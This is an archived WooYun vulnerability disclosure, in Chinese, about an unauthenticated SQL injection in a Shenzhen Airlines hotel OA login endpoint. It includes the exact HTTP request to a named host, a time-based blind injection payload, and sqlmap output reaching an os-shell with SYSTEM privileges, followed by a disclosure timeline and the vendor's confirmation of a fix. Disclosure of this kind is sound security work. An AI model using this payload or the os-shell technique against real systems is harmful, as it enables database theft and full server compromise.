乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-16: 细节已通知厂商并且等待厂商处理中 2015-09-16: 厂商已经确认,细节仅向厂商公开 2015-09-26: 细节向核心白帽子及相关领域专家公开 2015-10-06: 细节向普通白帽子公开 2015-10-16: 细节向实习白帽子公开 2015-10-31: 细节向公众公开
深航酒店某系统存在sql注入漏洞,无需登录,sa身份,可sqlmap --os-shell,system权限
没想到还有这么单纯的sql注入,并没有什么利用技巧注入引用文件
POST /c6/jhsoft.web.login/getpassword.aspx?flag=getEmail&UserName=HH1L11PN HTTP/1.1Content-Length: 14Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://oa.szahotel.com/Cookie: ASPSESSIONIDQCSRRARQ=PECLAIOBAAKOCOPHOEIEPFDP; ASP.NET_SessionId=xpv0yc55nxnheheluwkm4hr5; ASPSESSIONIDQCTQRDSQ=JJGJEEIBHBONALFBILHAMMBD; myie=falseHost: oa.szahotel.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*<root>e</root>
注入结果
sqlmap identified the following injection point(s) with a total of 113 HTTP(s) requests:---Parameter: UserName (GET) Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: flag=getEmail&UserName=HH1L11PN') WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2005current user: 'sa'sqlmap resumed the following injection point(s) from stored session:---Parameter: UserName (GET) Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: flag=getEmail&UserName=HH1L11PN') WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2005current user: 'sa'available databases [7]:[*] C6[*] C66[*] c6test[*] master[*] model[*] msdb[*] tempdb
os-shell> whoamido you want to retrieve the command standard output? [Y/n/a][11:10:01] [INFO] the SQL query used returns 1 entries[11:10:01] [INFO] retrieved: nt authority\\\\systemcommand standard output [1]:[*] nt authority\systemos-shell>
command standard output:---Windows IP 配置以太网适配器 本地连接 4: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . :以太网适配器 本地连接 3: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . :以太网适配器 本地连接 2: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . :以太网适配器 本地连接: 连接特定的 DNS 后缀 . . . . . . . : 本地链接 IPv6 地址. . . . . . . . : fe80::c01e:afc4:b10:815a IPv4 地址 . . . . . . . . . . . . : 88.88.88.100 子网掩码 . . . . . . . . . . . . : 255.255.255.0 默认网关. . . . . . . . . . . . . : 88.88.88.1隧道适配器 本地连接*: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . :隧道适配器 本地连接* 2: 连接特定的 DNS 后缀 . . . . . . . :---os-shell>
参数化或者waf只能说北京金和做的oa实在没考虑安全
危害等级:高
漏洞Rank:12
确认时间:2015-09-16 14:25
感谢您对深航信息系统的关心,已安排人员修复。
暂无